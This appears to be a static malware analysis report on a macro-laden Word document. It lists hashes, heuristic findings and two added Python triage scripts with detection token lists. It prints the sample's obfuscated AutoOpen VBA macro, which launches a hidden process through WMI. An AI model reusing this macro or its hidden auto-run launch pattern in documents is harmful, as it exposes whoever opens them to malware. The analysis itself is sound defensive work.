Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc2139ec6309f2f4…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 140.5 KB
Created: 2019-03-19 19:21:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 16b21ff19046f6465fb1f1cafcb0042b
SHA-1: b652f03bb907a21e9605ca43651d5077ddecc0f0
SHA-256: bc2139ec6309f2f44829ec98dfb28c4c498646469d1332dfc7f3927411f6af07
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Word document carrying a VBA project of three modules (rXDoUA1D, the WZA_U1B designer/userform module, and wAAcAZ). Module wAAcAZ defines Sub autoopen, so the code runs as soon as the document is opened with macros enabled. Stripped of the junk arithmetic (each If block holds a throwaway expression that either fails and is swallowed by On Error Resume Next or assigns a variable nothing reads), the routine does three things: it binds an object with GetObject, sets that object's ShowWindow property to 709285 - 709285 (that is, 0), and then calls .Create on a second GetObject result with a command line concatenated from properties of WZA_U1B, passing the first object as an argument. That is the shape of a WMI Win32_Process.Create launch with a hidden Win32_ProcessStartup window. The monikers and the command line live in the WZA_U1B form module, not in the extracted source, so what the spawned process downloads or runs cannot be confirmed from this preview alone; recover the form strings or detonate the sample to obtain the second-stage command. The ClamAV signature Doc.Malware.Drvb-6902289-0 corroborates the verdict. Note that the p-code disassembly at the end of this report labels the procedure wAAcAZ and loads an identifier named autoopen where the decompressed source reads If jwQX_AQ = bQAAUAXQ, so identifier names from the p-code dump should be cross-checked against the source rather than quoted at face value.

Heuristics (7)

  • ClamAV: Doc.Malware.Drvb-6902289-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Drvb-6902289-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call. In this sample one GetObject result has its ShowWindow property set to 0 and a second one receives a .Create call with a concatenated command line, a combination consistent with starting a hidden process through WMI (Win32_ProcessStartup plus Win32_Process.Create).
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Analyst note: a VBA project was recovered from this sample (see the extracted artifact below), so this marker adds no capability of its own here; treat it as redundant with the AutoOpen finding above.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    Analyst note: this is the DrawingML XML namespace identifier that Office markup carries; it is not an address the document contacts and should not be recorded as infrastructure for this sample.
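Added example, not part of the analyzer output or of oletools: a small source-level triage script that reproduces the logic behind the OLE_VBA_AUTOOPEN, OLE_VBA_GETOBJ and EMBEDDED_URL findings on the recovered macro. The VBA it parses is a constructed, abridged copy of the macros.bas preview later in this report (one junk block kept); the rule label HIDDEN_PROCESS_CREATE_PATTERN, the schema-URL prefix allowlist and the example.invalid URL are this example's own assumptions. It also folds the obfuscated 709285 - 709285 literal to 0 and strips the junk If blocks so the three operative statements stand out:

```python
"""Source-level triage of a decompressed VBA macro (added example, not the analyzer's code)."""
import ast
import operator
import re
from collections import Counter

# Procedures Word/Excel run on their own when a document is opened or closed.
AUTOEXEC_NAMES = {
    "autoopen", "auto_open", "autoexec", "autoclose", "auto_close",
    "document_open", "document_close", "workbook_open", "workbook_close",
}
# Assumed allowlist: URL prefixes that are XML namespace identifiers, not network indicators.
SCHEMA_URL_PREFIXES = (
    "http://schemas.openxmlformats.org/", "http://schemas.microsoft.com/",
    "http://www.w3.org/", "urn:schemas-microsoft-com:",
)
# Calls this obfuscator uses for junk arithmetic; they fail and are swallowed by On Error Resume Next.
JUNK_EXPR = re.compile(r"\b(?:ChrB|ChrW|Rnd|Oct|CBool)\s*\(", re.I)

# Constructed input: abridged from the macros.bas preview in this report.
SAMPLE_VBA = r'''Attribute VB_Name = "wAAcAZ"
Sub autoopen()
On Error Resume Next
   If jwQX_AQ = bQAAUAXQ Then
wBGXc1 = 70048900 - ChrB(470836093 * Round(414266693) + Q11Ux1 - ChrB(wxAAAAAA)) / w11QA1Bc
End If
Set TXABkB = GetObject(WZA_U1B.wAAXcA)
TXABkB.ShowWindow = 709285 - 709285
GetObject(WZA_U1B.nAAA_x).Create% EUxQU_A + WZA_U1B.PABZAxAD + AxAAkBAQ, BA4UxAA, TXABkB, IAxA4AA
End Sub
'''

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}

def fold_const(expr):
    """Fold integer +,-,* arithmetic such as '709285 - 709285' to its value; None if not constant."""
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError:
        return None

    def ev(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](ev(node.left), ev(node.right))
        raise ValueError("not a constant expression")

    try:
        return ev(tree.body)
    except ValueError:
        return None

def dejunk(source):
    """Drop junk arithmetic lines and the empty If ... Then / End If shells left around them."""
    kept = [ln for ln in source.splitlines() if not JUNK_EXPR.search(ln)]
    out = []
    for ln in kept:
        if out and re.match(r"\s*End If\b", ln, re.I) and re.match(r"\s*If\b.*\bThen\s*$", out[-1], re.I):
            out.pop()  # the If only guarded junk: remove the shell as well
            continue
        out.append(ln)
    return [ln.strip() for ln in out if ln.strip()]

def triage_vba(source):
    """Collect the indicators the report's OLE_VBA_* heuristics key on."""
    f = {
        "autoexec": [],
        "on_error_resume_next": re.search(r"^\s*On Error Resume Next\b", source, re.M | re.I) is not None,
        "getobject_args": [a.strip() for a in re.findall(r"\bGetObject\s*\(([^)]*)\)", source, re.I)],
        "create_call": re.search(r"\.Create\b", source, re.I) is not None,
        "hidden_window": False,
        "qualified_refs": {},
    }
    for m in re.finditer(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", source, re.M | re.I):
        if m.group(1).lower() in AUTOEXEC_NAMES:
            f["autoexec"].append(m.group(1))
    m = re.search(r"\.ShowWindow\s*=\s*([^\r\n']+)", source, re.I)
    if m:
        f["hidden_window"] = fold_const(m.group(1)) == 0  # SW_HIDE once the literal is folded
    # Module-qualified names such as WZA_U1B.nAAA_x: the strings that matter (monikers,
    # command line) are fetched from another module and are absent from this source.
    f["qualified_refs"] = dict(Counter(q for q, _ in re.findall(r"\b([A-Za-z_]\w*)\.([A-Za-z_]\w*)", source)))
    return f

def triggered_rules(f):
    """Rule labels: the first two mirror the report; HIDDEN_PROCESS_CREATE_PATTERN is this example's own."""
    rules = []
    if f["autoexec"]:
        rules.append("OLE_VBA_AUTOOPEN")
    if f["getobject_args"]:
        rules.append("OLE_VBA_GETOBJ")
    if f["getobject_args"] and f["create_call"] and f["hidden_window"]:
        rules.append("HIDDEN_PROCESS_CREATE_PATTERN")  # GetObject(...).Create plus a hidden window
    return rules

def classify_urls(urls):
    """Separate Office schema namespace URIs from URLs an analyst should review."""
    return {u: "schema-namespace" if u.lower().startswith(SCHEMA_URL_PREFIXES) else "review" for u in urls}

if __name__ == "__main__":
    findings = triage_vba(SAMPLE_VBA)
    print("\n".join(dejunk(SAMPLE_VBA)), findings, triggered_rules(findings), sep="\n")
    # Second URL is a constructed placeholder, not an indicator from this sample.
    print(classify_urls(["http://schemas.openxmlformats.org/drawingml/2006/main", "http://example.invalid/stage2"]))
```

The qualified_refs count is the useful negative result: every string that matters (the GetObject monikers and the command line) is fetched from the WZA_U1B userform, so a source-only view cannot name the second stage; the form's streams or a detonation are needed for that.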

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11466 bytes
SHA-256: 28e3a5c2a3151deacd386b8141567217489a1e11f40044bc3d741e6092ee2453

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "rXDoUA1D"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WZA_U1B"
Attribute VB_Base = "0{75E9A92E-ECF1-4CCF-AF6C-5F39DBCAA415}{5478F83B-268A-4049-9EB6-E3BE4B2695D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wAAcAZ"
Sub autoopen()
On Error Resume Next
   If jwQX_AQ = bQAAUAXQ Then
wBGXc1 = 70048900 - ChrB(470836093 * Round(414266693) + Q11Ux1 - ChrB(wxAAAAAA)) / w11QA1Bc / Rnd(32834712 / VXDQ_X_Q * SpBb / ChrW(666234281 * CBool(678345324) / 441023156 + CStr(skADAoCG))) / 243962631 * Oct(FcQUxAx)
End If
   If E4UADQ = ak1QDxA Then
A4AAXUD = 181341305 - ChrB(2559126 * Round(651620675) + WUQAkw - ChrB(ABkA1oGQ)) / nAxkAUo / Rnd(663640487 / QDDk4A * SpBb / ChrW(86560935 * CBool(722992906) / 766325832 + CStr(qBUZ_Z))) / 639759154 * Oct(k1AAAA)
End If
Set TXABkB = GetObject(WZA_U1B.wAAXcA)
   If lABABAXA = DAZABX Then
lQ1AAAAZ = 261543561 - ChrB(776236418 * Round(742841960) + SZAQQQU - ChrB(OBZAwQ4Q)) / hAo_4GA / Rnd(859834665 / ZUGABUA * SpBb / ChrW(613997888 * CBool(628780582) / 97799350 + CStr(pCZ_B1Z))) / 286060895 * Oct(VA_XZx1k)
End If
   If wkAZQBXG = kQwcAx Then
FAUAAGXA = 692173888 - ChrB(882530444 * Round(261562846) + WwA_Uc - ChrB(WUAABA)) / KBcw_BZ / Rnd(194635374 / oAUA1UZ * SpBb / ChrW(913345409 * CBool(269177192) / 335333058 + CStr(SAADGAA))) / 409932476 * Oct(NAZA1XA4)
End If
   If wAZA_o = z1CGAo Then
YwDBkDDo = 565046529 - ChrB(982937593 * Round(827222769) + vADX__ - ChrB(kwA4BUUc)) / P4AADGA / Rnd(908708001 / fAZAGkDA * SpBb / ChrW(569750413 * CBool(465100729) / 963190173 + CStr(tQc4A1))) / 379682012 * Oct(S4QA1A1U)
End If
TXABkB.ShowWindow = 709285 - 709285
   If HkAQ1A = qQcc4Q Then
wAQA1X = 707896374 - ChrB(949739080 * Round(402376951) + uA1AACoA - ChrB(XZABUAck)) / Co1DDA / Rnd(621640367 / VwUGAQDQ * SpBb / ChrW(104621335 * CBool(720898872) / 57388389 + CStr(QUZAx_))) / 585106962 * Oct(rABAx_wA)
End If
   If fQDAGCZ = q1BAAUC Then
cUXDAA_ = 883231790 - ChrB(228047737 * Round(55639862) + ckBA4Aoc - ChrB(vAAAX1)) / nAAC__AA / Rnd(973477493 / pA_DoAX1 * SpBb / ChrW(993290355 * CBool(177148998) / 637207538 + CStr(KAQDDQ))) / 736677806 * Oct(N1UABA)
End If
GetObject(WZA_U1B.nAAA_x).Create% EUxQU_A + WZA_U1B.PABZAxAD + AxAAkBAQ + WZA_U1B.V_AAkAZ + vAXAAA_A + WZA_U1B.dAZU_Ao + jQXBAQD, BA4UxAA, TXABkB, IAxA4AA
   If ECAU4QA = JAwBDA Then
IX1o1DQA = 437120822 - ChrB(346753572 * Round(246870008) + OUAAGAo - ChrB(UZwAxAU)) / rDGAUA / Rnd(708072242 / JAAXDAoA * SpBb / ChrW(448745315 * CBool(68302440) / 232509212 + CStr(ZCUQQGBA))) / 796841784 * Oct(FA_AQxU4)
End If
   If jBUABCZA = zA4UDw4 Then
DxAAD4 = 120193573 - ChrB(246416607 * Round(456916623) + R_A1oZCA - ChrB(uoDGAA_)) / Zo4A1oox / Rnd(350564299 / jxkDAQx * SpBb / ChrW(282469471 * CBool(826474509) / 879884602 + CStr(BCXAUAXU))) / 653008359 * Oct(hxAQ4Ax)
End If
   If ix1GoDA = no1BADQ1 Then
PwQBoCA = 803746356 - ChrB(302626175 * Round(972335703) + SAAocZAQ - ChrB(oCAAAUx)) / nBAADk / Rnd(146735218 / l1AAGoZC * SpBb / ChrW(812377195 * CBool(386771033) / 99860431 + CStr(GBG_BGA))) / 318334200 * Oct(AoAAABGA)
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/699c3aeabc084eaaa63186b5c15b2905.bin
' ===============================================================================
' Module streams:
' Macros/VBA/rXDoUA1D - 1106 bytes
' Macros/VBA/WZA_U1B - 1158 bytes
' Macros/VBA/wAAcAZ - 5100 bytes
' Line #0:
' 	FuncDefn (Sub wAAcAZ())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld autoopen 
' 	Ld jwQX_AQ 
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LitDI4 0xDC84 0x042C 
' 	LitDI4 0x637D 0x1C10 
' 	LitDI4 0x3545 0x18B1 
' 	ArgsLd Round 0x0001 
' 	Mul 
' 	Ld wBGXc1 
' 	Add 
' 	Ld Q11Ux1 
' 	ArgsL
... (truncated)
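Added example, not the analyzer's rule code, for the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic: a parser for the p-code listing format shown above that flags an auto-exec identifier together with execution tokens, and that diffs the identifiers seen in p-code against those in the decompressed source. The listing it parses is constructed: the first tokens are copied from the report, the lines after Line #2 are assumed pcodedmp-style mnemonics for the GetObject, ShowWindow and Create statements (not output captured from this sample), and the source snippet is abridged from the macros.bas preview.

```python
"""Triage of an olevba/pcodedmp-style p-code listing (added example, not the analyzer's code)."""
import re

AUTOEXEC_NAMES = {"autoopen", "auto_open", "autoexec", "autoclose", "auto_close",
                  "document_open", "document_close", "workbook_open", "workbook_close"}
# Identifiers that mean shell/download/object execution when they appear as operands.
EXEC_TOKENS = {"getobject", "createobject", "create", "shell", "showwindow",
               "run", "exec", "wscript", "urldownloadtofile"}

# Constructed listing: Line #0-#2 copied from the report, later lines are assumed mnemonics.
SAMPLE_LISTING = """\
' Module streams:
' Macros/VBA/wAAcAZ - 5100 bytes
' Line #0:
' \tFuncDefn (Sub wAAcAZ())
' Line #1:
' \tOnError (Resume Next) 
' Line #2:
' \tLd autoopen 
' \tLd jwQX_AQ 
' \tEq 
' \tIfBlock 
' Line #5:
' \tLd WZA_U1B
' \tMemLd wAAXcA
' \tArgsLd GetObject 0x0001
' \tSet TXABkB
' Line #6:
' \tLitDI2 0x0000
' \tLd TXABkB
' \tMemSt ShowWindow
' Line #7:
' \tArgsMemCall Create 0x0004
"""

# Source of the same procedure, abridged from the report's macros.bas preview.
SAMPLE_SOURCE = """\
Sub autoopen()
On Error Resume Next
   If jwQX_AQ = bQAAUAXQ Then
   End If
Set TXABkB = GetObject(WZA_U1B.wAAXcA)
TXABkB.ShowWindow = 709285 - 709285
GetObject(WZA_U1B.nAAA_x).Create% EUxQU_A + WZA_U1B.PABZAxAD, BA4UxAA, TXABkB, IAxA4AA
End Sub
"""

LINE_RE = re.compile(r"^'\s*Line #(\d+):")
TOKEN_RE = re.compile(r"^'\s+(\S+)(?:\s+(.*?))?\s*$")
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")  # skips 0x... hex operands

def parse_pcode_listing(text):
    """Return (vba_line, opcode, operand) triples; header lines before 'Line #0' are skipped."""
    ops, cur = [], None
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if m:
            cur = int(m.group(1))
            continue
        m = TOKEN_RE.match(raw) if cur is not None else None
        if m:
            ops.append((cur, m.group(1), m.group(2) or ""))
    return ops

def operand_identifiers(ops):
    return {w for _, _, operand in ops for w in IDENT_RE.findall(operand)}

def loaded_names(ops):
    """Names pushed by Ld, i.e. variables and constants the procedure reads."""
    return [operand for _, opcode, operand in ops if opcode == "Ld"]

def defined_procedures(ops):
    """Procedure names from FuncDefn tokens."""
    found = []
    for _, opcode, operand in ops:
        m = re.search(r"\b(?:Sub|Function)\s+(\w+)", operand) if opcode == "FuncDefn" else None
        if m:
            found.append(m.group(1))
    return found

def pcode_autoexec_exec(ops):
    """The OLE_VBA_PCODE_AUTOEXEC_EXEC idea: an auto-exec name together with an execution token."""
    ids = {w.lower() for w in operand_identifiers(ops)}
    auto, execs = sorted(ids & AUTOEXEC_NAMES), sorted(ids & EXEC_TOKENS)
    return {"autoexec": auto, "exec": execs, "fires": bool(auto and execs)}

def identifier_diff(ops, source):
    """Names seen only in p-code or only in source: where the two views disagree."""
    p = operand_identifiers(ops)
    s = set(IDENT_RE.findall(source))
    return {"pcode_only": sorted(p - s), "source_only": sorted(s - p)}

if __name__ == "__main__":
    ops = parse_pcode_listing(SAMPLE_LISTING)
    print(defined_procedures(ops), pcode_autoexec_exec(ops), identifier_diff(ops, SAMPLE_SOURCE), sep="\n")
```

On this input the rule fires on autoopen plus create, getobject and showwindow. The identifier diff reports wAAcAZ as p-code-only: the listing labels the procedure wAAcAZ and pushes an identifier called autoopen where the source reads jwQX_AQ = bQAAUAXQ, which is the kind of disagreement to resolve before quoting names from either view.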